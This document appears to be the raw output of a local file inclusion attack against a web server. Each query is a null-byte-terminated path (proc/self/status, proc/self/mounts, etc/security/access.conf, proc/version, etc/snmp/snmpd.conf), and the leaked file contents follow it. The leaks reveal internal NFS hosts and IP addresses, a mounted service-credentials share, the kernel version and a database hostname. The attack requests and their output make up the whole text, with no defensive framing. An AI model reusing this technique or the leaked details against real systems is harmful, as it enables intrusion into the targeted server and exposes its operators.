- netdata2nfs:/vol/common /common nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
- netdata2nfs:/vol/cache /cache nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
- netdata1nfs:/vol/apps_data /www/apps-data nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/forecast /www/apps-data/gridpoint/ready nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.47 0 0
- netdata1nfs:/vol/radar /www/html/ridge nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/images /www/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/climate /www/html/climate nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/ahps /www/water nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.46 0 0
- netdata1nfs:/vol/share/etc/db /etc/db nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/share/etc/service_credentials /etc/service_credentials nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/nwschat /home/nwschat nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/common/etc/pki/tls /etc/pki/tls nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
- netdata1nfs:/vol/gifs /www/gifs nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/www1 /www1 nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
- netdata1nfs:/vol/www1_images /www1/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- <b>Query Used: proc/self/status%00</b>Name: httpd
- State: R (running)
- Tgid: 9191
- Pid: 9191
- PPid: 5228
- TracerPid: 0
- Uid: 48 48 48 48
- Gid: 48 48 48 48
- Utrace: 0
- FDSize: 128
- Groups: 48
- VmPeak: 426820 kB
- VmSize: 420556 kB
- VmLck: 0 kB
- VmHWM: 44560 kB
- VmRSS: 40024 kB
- VmData: 32116 kB
- VmStk: 104 kB
- VmExe: 332 kB
- VmLib: 38136 kB
- VmPTE: 804 kB
- VmSwap: 836 kB
- Threads: 1
- SigQ: 0/1161533
- SigPnd: 0000000000000000
- ShdPnd: 0000000000000000
- SigBlk: 0000000000000000
- SigIgn: 0000000001001000
- SigCgt: 000000018c0046eb
- CapInh: 0000000000000000
- CapPrm: 0000000000000000
- CapEff: 0000000000000000
- CapBnd: ffffffffffffffff
- Cpus_allowed: ffffffff
- Cpus_allowed_list: 0-31
- Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003
- Mems_allowed_list: 0-1
- voluntary_ctxt_switches: 52112
- nonvoluntary_ctxt_switches: 956
- <b>Query Used: proc/self/stat%00</b>5824 (httpd) R 5336 5336 5336 0 -1 4202816 40863 19965 0 0 104 32 6 152 20 0 1 0 708449526 475176960 24466 18446744073709551615 140664139448320 140664139788020 140736967080416 140736967064728 140664112286128 0 0 16781312 201344747 0 0 0 17 5 0 0 683 0 0
- <b>Query Used: proc/self/mounts%00</b>rootfs / rootfs rw 0 0
- proc /proc proc rw,relatime 0 0
- sysfs /sys sysfs rw,seclabel,relatime 0 0
- devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
- devpts /dev/pts devpts rw,seclabel,relatime,gid=5,mode=620,ptmxmode=000 0 0
- tmpfs /dev/shm tmpfs rw,seclabel,relatime 0 0
- /dev/mapper/VolGroup00-LogVol01 / ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
- none /selinux selinuxfs rw,relatime 0 0
- devtmpfs /dev devtmpfs rw,seclabel,relatime,size=74338140k,nr_inodes=18584535,mode=755 0 0
- /proc/bus/usb /proc/bus/usb usbfs rw,relatime 0 0
- /dev/sda1 /boot ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0
- none /proc/sys/fs/binfmt_misc binfmt_misc rw,relatime 0 0
- sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0
- netdata2nfs:/vol/www /www nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
- netdata2nfs:/vol/common /common nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
- netdata2nfs:/vol/cache /cache nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
- netdata1nfs:/vol/apps_data /www/apps-data nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/forecast /www/apps-data/gridpoint/ready nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.47 0 0
- netdata1nfs:/vol/radar /www/html/ridge nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/images /www/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/climate /www/html/climate nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/ahps /www/water nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,acregmin=600,acregmax=600,acdirmin=600,acdirmax=600,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.46 0 0
- netdata1nfs:/vol/share/etc/db /etc/db nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/share/etc/service_credentials /etc/service_credentials nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata1nfs:/vol/nwschat /home/nwschat nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/common/etc/pki/tls /etc/pki/tls nfs rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,proto=tcp,timeo=14,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=udp,local_lock=none,addr=10.251.3.47 0 0
- netdata1nfs:/vol/gifs /www/gifs nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- netdata2nfs:/vol/www1 /www1 nfs ro,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.251.3.47,mountvers=3,mountport=4046,mountproto=tcp,local_lock=all,addr=10.251.3.47 0 0
- netdata1nfs:/vol/www1_images /www1/images nfs ro,noatime,nodiratime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nocto,proto=tcp,timeo=600,retrans=3,sec=sys,mountaddr=10.251.3.46,mountvers=3,mountport=4046,mountproto=tcp,local_lock=none,addr=10.251.3.46 0 0
- <b>Query Used: etc/security/access.conf%00</b># Login access control table.
- #
- # Comment line must start with "#", no space at front.
- # Order of lines is important.
- #
- # When someone logs in, the table is scanned for the first entry that
- # matches the (user, host) combination, or, in case of non-networked
- # logins, the first entry that matches the (user, tty) combination. The
- # permissions field of that table entry determines whether the login will
- # be accepted or refused.
- #
- # Format of the login access control table is three fields separated by a
- # ":" character:
- #
- # [Note, if you supply a 'fieldsep=|' argument to the pam_access.so
- # module, you can change the field separation character to be
- # '|'. This is useful for configurations where you are trying to use
- # pam_access with X applications that provide PAM_TTY values that are
- # the display variable like "host:0".]
- #
- # permission : users : origins
- #
- # The first field should be a "+" (access granted) or "-" (access denied)
- # character.
- #
- # The second field should be a list of one or more login names, group
- # names, or ALL (always matches). A pattern of the form user@host is
- # matched when the login name matches the "user" part, and when the
- # "host" part matches the local machine name.
- #
- # The third field should be a list of one or more tty names (for
- # non-networked logins), host names, domain names (begin with "."), host
- # addresses, internet network numbers (end with "."), ALL (always
- # matches), NONE (matches no tty on non-networked logins) or
- # LOCAL (matches any string that does not contain a "." character).
- #
- # You can use @netgroupname in host or user patterns; this even works
- # for @usergroup@@hostgroup patterns.
- #
- # The EXCEPT operator makes it possible to write very compact rules.
- #
- # The group file is searched only when a name does not match that of the
- # logged-in user. Both the user's primary group is matched, as well as
- # groups in which users are explicitly listed.
- # To avoid problems with accounts, which have the same name as a group,
- # you can use brackets around group names '(group)' to differentiate.
- # In this case, you should also set the "nodefgroup" option.
- #
- # TTY NAMES: Must be in the form returned by ttyname(3) less the initial
- # "/dev" (e.g. tty1 or vc/1)
- #
- ##############################################################################
- #
- # Disallow non-root logins on tty1
- #
- #-:ALL EXCEPT root:tty1
- #
- # Disallow console logins to all but a few accounts.
- #
- #-:ALL EXCEPT wheel shutdown sync:LOCAL
- #
- # Same, but make sure that really the group wheel and not the user
- # wheel is used (use nodefgroup argument, too):
- #
- #-:ALL EXCEPT (wheel) shutdown sync:LOCAL
- #
- # Disallow non-local logins to privileged accounts (group wheel).
- #
- #-:wheel:ALL EXCEPT LOCAL .win.tue.nl
- #
- # Some accounts are not allowed to login from anywhere:
- #
- #-:wsbscaro wsbsecr wsbspac wsbsym wscosor wstaiwde:ALL
- #
- # All other accounts are allowed to login from anywhere.
- #
- ##############################################################################
- # All lines from here up to the end are building a more complex example.
- ##############################################################################
- #
- # User "root" should be allowed to get access via cron .. tty5 tty6.
- #+ : root : cron crond :0 tty1 tty2 tty3 tty4 tty5 tty6
- #
- # User "root" should be allowed to get access from hosts with ip addresses.
- #+ : root : 192.168.200.1 192.168.200.4 192.168.200.9
- #+ : root : 127.0.0.1
- #
- # User "root" should get access from network 192.168.201.
- # This term will be evaluated by string matching.
- # comment: It might be better to use network/netmask instead.
- # The same is 192.168.201.0/24 or 192.168.201.0/255.255.255.0
- #+ : root : 192.168.201.
- #
- # User "root" should be able to have access from domain.
- # Uses string matching also.
- #+ : root : .foo.bar.org
- #
- # User "root" should be denied to get access from all other sources.
- #- : root : ALL
- #
- # User "foo" and members of netgroup "nis_group" should be
- # allowed to get access from all sources.
- # This will only work if netgroup service is available.
- #+ : @nis_group foo : ALL
- #
- # User "john" should get access from ipv4 net/mask
- #+ : john : 127.0.0.0/24
- #
- # User "john" should get access from ipv4 as ipv6 net/mask
- #+ : john : ::ffff:127.0.0.0/127
- #
- # User "john" should get access from ipv6 host address
- #+ : john : 2001:4ca0:0:101::1
- #
- # User "john" should get access from ipv6 host address (same as above)
- #+ : john : 2001:4ca0:0:101:0:0:0:1
- #
- # User "john" should get access from ipv6 net/mask
- #+ : john : 2001:4ca0:0:101::/64
- #
- # All other users should be denied to get access from all sources.
- #- : ALL : ALL
- <b>Query Used: etc/ldap/ldap.conf%00</b>.<b>Query Used: proc/version%00</b>Linux version 2.6.32-279.1.1.el6.x86_64 (mockbuild@x86-003.build.bos.redhat.com) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Jun 20 11:41:22 EDT 2012
- <b>Query Used: etc/cups/printers.conf%00</b>.<b>Query Used: etc/cups/cupsd.conf.default%00</b>.<b>Query Used: etc/inetd.conf%00</b>.<b>Query Used: etc/apache2/conf.d%00</b>.<b>Query Used: etc/apache2/conf.d/security%00</b>.<b>Query Used: etc/samba/dhcp.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/gconf%00</b>.<b>Query Used: proc/self/cmdline%00</b>/usr/sbin/httpd\00<b>Query Used: etc/irssi.conf%00</b>.<b>Query Used: etc/chkrootkit.conf%00</b>.<b>Query Used: etc/ufw/sysctl.conf%00</b>.<b>Query Used: etc/ufw/ufw.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/syslog.conf%00</b>Array
- (
- [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
- Too many connections
- )
- <b>Query Used: etc/snmp/snmpd.conf%00</b>###############################################################################
- #
- # snmpd.conf:
- # An example configuration file for configuring the ucd-snmp snmpd agent.
- #
- ###############################################################################
- #
- # This file is intended to only be as a starting point. Many more
- # configuration directives exist than are mentioned in this file. For
- # full details, see the snmpd.conf(5) manual page.
- #
- # All lines beginning with a '#' are comments and are intended for you
- # to read. All other lines are configuration commands for the agent.
- ###############################################################################
- # Access Control
- ###############################################################################
- # As shipped, the snmpd demon will only respond to queries on the
- # system mib group until this file is replaced or modified for
- # security purposes. Examples are shown below about how to increase the
- # level of access.
- # By far, the most common question I get about the agent is "why won't
- # it work?", when really it should be "how do I configure the agent to
- # allow me to access it?"
- #
- # By default, the agent responds to the "public" community for read
- # only access, if run out of the box without any configuration file in
- # place. The following examples show you other ways of configuring
- # the agent so that you can change the community names, and give
- # yourself write access to the mib tree as well.
- #
- # For more information, read the FAQ as well as the snmpd.conf(5)
- # manual page.
- ####
- # First, map the community name "public" into a "security name"
- # sec.name source community
- com2sec notConfigUser default public
- ####
- # Second, map the security name into a group name:
- # groupName securityModel securityName
- group notConfigGroup v1 notConfigUser
- group notConfigGroup v2c notConfigUser
- ####
- # Third, create a view for us to let the group have rights to:
- # Make at least snmpwalk -v 1 localhost -c public system fast again.
- # name incl/excl subtree mask(optional)
- view systemview included .1.3.6.1.2.1.1
- view systemview included .1.3.6.1.2.1.25.1.1
- ####
- # Finally, grant the group read-only access to the systemview view.
- # group context sec.model sec.level prefix read write notif
- access notConfigGroup "" any noauth exact systemview none none
- # -----------------------------------------------------------------------------
- # Here is a commented out example configuration that allows less
- # restrictive access.
- # YOU SHOULD CHANGE THE "COMMUNITY" TOKEN BELOW TO A NEW KEYWORD ONLY
- # KNOWN AT YOUR SITE. YOU *MUST* CHANGE THE NETWORK TOKEN BELOW TO
- # SOMETHING REFLECTING YOUR LOCAL NETWORK ADDRESS SPACE.
- ## sec.name source community
- #com2sec local localhost COMMUNITY
- #com2sec mynetwork NETWORK/24 COMMUNITY
- ## group.name sec.model sec.name
- #group MyRWGroup any local
- #group MyROGroup any mynetwork
- #
- #group MyRWGroup any otherv3user
- #...
- ## incl/excl subtree mask
- #view all included .1 80
- ## -or just the mib2 tree-
- #view mib2 included .iso.org.dod.internet.mgmt.mib-2 fc
- ## context sec.model sec.level prefix read write notif
- #access MyROGroup "" any noauth 0 all none none
- #access MyRWGroup "" any noauth 0 all all all
- ###############################################################################
- # Sample configuration to make net-snmpd RFC 1213.
- # Unfortunately v1 and v2c don't allow any user based authentification, so
- # opening up the default config is not an option from a security point.
- #
- # WARNING: If you uncomment the following lines you allow write access to your
- # snmpd daemon from any source! To avoid this use different names for your
- # community or split out the write access to a different community and
- # restrict it to your local network.
- # Also remember to comment the syslocation and syscontact parameters later as
- # otherwise they are still read only (see FAQ for net-snmp).
- #
- # First, map the community name "public" into a "security name"
- # sec.name source community
- #com2sec notConfigUser default public
- # Second, map the security name into a group name:
- # groupName securityModel securityName
- #group notConfigGroup v1 notConfigUser
- #group notConfigGroup v2c notConfigUser
- # Third, create a view for us to let the group have rights to:
- # Open up the whole tree for ro, make the RFC 1213 required ones rw.
- # name incl/excl subtree mask(optional)
- #view roview included .1
- #view rwview included system.sysContact
- #view rwview included system.sysName
- #view rwview included system.sysLocation
- #view rwview included interfaces.ifTable.ifEntry.ifAdminStatus
- #view rwview included at.atTable.atEntry.atPhysAddress
- #view rwview included at.atTable.atEntry.atNetAddress
- #view rwview included ip.ipForwarding
- #view rwview included ip.ipDefaultTTL
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask
- #view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress
- #view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType
- #view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState
- #view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger
- #view rwview included snmp.snmpEnableAuthenTraps
- # Finally, grant the group read-only access to the systemview view.
- # group context sec.model sec.level prefix read write notif
- #access notConfigGroup "" any noauth exact roview rwview none
- ###############################################################################
- # System contact information
- #
- # It is also possible to set the sysContact and sysLocation system
- # variables through the snmpd.conf file:
- syslocation Unknown (edit /etc/snmp/snmpd.conf)
- syscontact Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
- # Example output of snmpwalk:
- # % snmpwalk -v 1 localhost -c public system
- # system.sysDescr.0 = "SunOS name sun4c"
- # system.sysObjectID.0 = OID: enterprises.ucdavis.ucdSnmpAgent.sunos4
- # system.sysUpTime.0 = Timeticks: (595637548) 68 days, 22:32:55
- # system.sysContact.0 = "Me <me@somewhere.org>"
- # system.sysName.0 = "name"
- # system.sysLocation.0 = "Right here, right now."
- # system.sysServices.0 = 72
- ###############################################################################
- # Logging
- #
- # We do not want annoying "Connection from UDP: " messages in syslog.
- # If the following option is commented out, snmpd will print each incoming
- # connection, which can be useful for debugging.
- dontLogTCPWrappersConnects yes
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Process checks.
- #
- # The following are examples of how to use the agent to check for
- # processes running on the host. The syntax looks something like:
- #
- # proc NAME [MAX=0] [MIN=0]
- #
- # NAME: the name of the process to check for. It must match
- # exactly (ie, http will not find httpd processes).
- # MAX: the maximum number allowed to be running. Defaults to 0.
- # MIN: the minimum number to be running. Defaults to 0.
- #
- # Examples (commented out by default):
- #
- # Make sure mountd is running
- #proc mountd
- # Make sure there are no more than 4 ntalkds running, but 0 is ok too.
- #proc ntalkd 4
- # Make sure at least one sendmail, but less than or equal to 10 are running.
- #proc sendmail 10 1
- # A snmpwalk of the process mib tree would look something like this:
- #
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.2
- # enterprises.ucdavis.procTable.prEntry.prIndex.1 = 1
- # enterprises.ucdavis.procTable.prEntry.prIndex.2 = 2
- # enterprises.ucdavis.procTable.prEntry.prIndex.3 = 3
- # enterprises.ucdavis.procTable.prEntry.prNames.1 = "mountd"
- # enterprises.ucdavis.procTable.prEntry.prNames.2 = "ntalkd"
- # enterprises.ucdavis.procTable.prEntry.prNames.3 = "sendmail"
- # enterprises.ucdavis.procTable.prEntry.prMin.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prMin.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prMin.3 = 1
- # enterprises.ucdavis.procTable.prEntry.prMax.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prMax.2 = 4
- # enterprises.ucdavis.procTable.prEntry.prMax.3 = 10
- # enterprises.ucdavis.procTable.prEntry.prCount.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prCount.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prCount.3 = 1
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.1 = 1
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrorFlag.3 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.1 = "No mountd process running."
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.2 = ""
- # enterprises.ucdavis.procTable.prEntry.prErrMessage.3 = ""
- # enterprises.ucdavis.procTable.prEntry.prErrFix.1 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrFix.2 = 0
- # enterprises.ucdavis.procTable.prEntry.prErrFix.3 = 0
- #
- # Note that the errorFlag for mountd is set to 1 because one is not
- # running (in this case an rpc.mountd is, but thats not good enough),
- # and the ErrMessage tells you what's wrong. The configuration
- # imposed in the snmpd.conf file is also shown.
- #
- # Special Case: When the min and max numbers are both 0, it assumes
- # you want a max of infinity and a min of 1.
- #
- # -----------------------------------------------------------------------------
- ###############################################################################
- # Executables/scripts
- #
- #
- # You can also have programs run by the agent that return a single
- # line of output and an exit code. Here are two examples.
- #
- # exec NAME PROGRAM [ARGS ...]
- #
- # NAME: A generic name. The name must be unique for each exec statement.
- # PROGRAM: The program to run. Include the path!
- # ARGS: optional arguments to be passed to the program
- # a simple hello world
- #exec echotest /bin/echo hello world
- # Run a shell script containing:
- #
- # #!/bin/sh
- # echo hello world
- # echo hi there
- # exit 35
- #
- # Note: this has been specifically commented out to prevent
- # accidental security holes due to someone else on your system writing
- # a /tmp/shtest before you do. Uncomment to use it.
- #
- #exec shelltest /bin/sh /tmp/shtest
- # Then,
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.8
- # enterprises.ucdavis.extTable.extEntry.extIndex.1 = 1
- # enterprises.ucdavis.extTable.extEntry.extIndex.2 = 2
- # enterprises.ucdavis.extTable.extEntry.extNames.1 = "echotest"
- # enterprises.ucdavis.extTable.extEntry.extNames.2 = "shelltest"
- # enterprises.ucdavis.extTable.extEntry.extCommand.1 = "/bin/echo hello world"
- # enterprises.ucdavis.extTable.extEntry.extCommand.2 = "/bin/sh /tmp/shtest"
- # enterprises.ucdavis.extTable.extEntry.extResult.1 = 0
- # enterprises.ucdavis.extTable.extEntry.extResult.2 = 35
- # enterprises.ucdavis.extTable.extEntry.extOutput.1 = "hello world."
- # enterprises.ucdavis.extTable.extEntry.extOutput.2 = "hello world."
- # enterprises.ucdavis.extTable.extEntry.extErrFix.1 = 0
- # enterprises.ucdavis.extTable.extEntry.extErrFix.2 = 0
- # Note that the second line of the /tmp/shtest shell script is cut
- # off. Also note that the exit status of 35 was returned.
- # -----------------------------------------------------------------------------
- ###############################################################################
- # disk checks
- #
- # The agent can check the amount of available disk space, and make
- # sure it is above a set limit.
- # disk PATH [MIN=100000]
- #
- # PATH: mount path to the disk in question.
- # MIN: Disks with space below this value will have the Mib's errorFlag set.
- # Default value = 100000.
- # Check the / partition and make sure it contains at least 10 megs.
- #disk / 10000
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.9
- # enterprises.ucdavis.diskTable.dskEntry.diskIndex.1 = 0
- # enterprises.ucdavis.diskTable.dskEntry.diskPath.1 = "/" Hex: 2F
- # enterprises.ucdavis.diskTable.dskEntry.diskDevice.1 = "/dev/dsk/c201d6s0"
- # enterprises.ucdavis.diskTable.dskEntry.diskMinimum.1 = 10000
- # enterprises.ucdavis.diskTable.dskEntry.diskTotal.1 = 837130
- # enterprises.ucdavis.diskTable.dskEntry.diskAvail.1 = 316325
- # enterprises.ucdavis.diskTable.dskEntry.diskUsed.1 = 437092
- # enterprises.ucdavis.diskTable.dskEntry.diskPercent.1 = 58
- # enterprises.ucdavis.diskTable.dskEntry.diskErrorFlag.1 = 0
- # enterprises.ucdavis.diskTable.dskEntry.diskErrorMsg.1 = ""
- # -----------------------------------------------------------------------------
- ###############################################################################
- # load average checks
- #
- # load [1MAX=12.0] [5MAX=12.0] [15MAX=12.0]
- #
- # 1MAX: If the 1 minute load average is above this limit at query
- # time, the errorFlag will be set.
- # 5MAX: Similar, but for 5 min average.
- # 15MAX: Similar, but for 15 min average.
- # Check for loads:
- #load 12 14 14
- # % snmpwalk -v 1 localhost -c public .1.3.6.1.4.1.2021.10
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.1 = 1
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.2 = 2
- # enterprises.ucdavis.loadTable.laEntry.loadaveIndex.3 = 3
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.1 = "Load-1"
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.2 = "Load-5"
- # enterprises.ucdavis.loadTable.laEntry.loadaveNames.3 = "Load-15"
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.1 = "0.49" Hex: 30 2E 34 39
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.2 = "0.31" Hex: 30 2E 33 31
- # enterprises.ucdavis.loadTable.laEntry.loadaveLoad.3 = "0.26" Hex: 30 2E 32 36
- # enterprises.ucdavis.loadTable.laEntry.loadaveConfig.1 = "12.00"
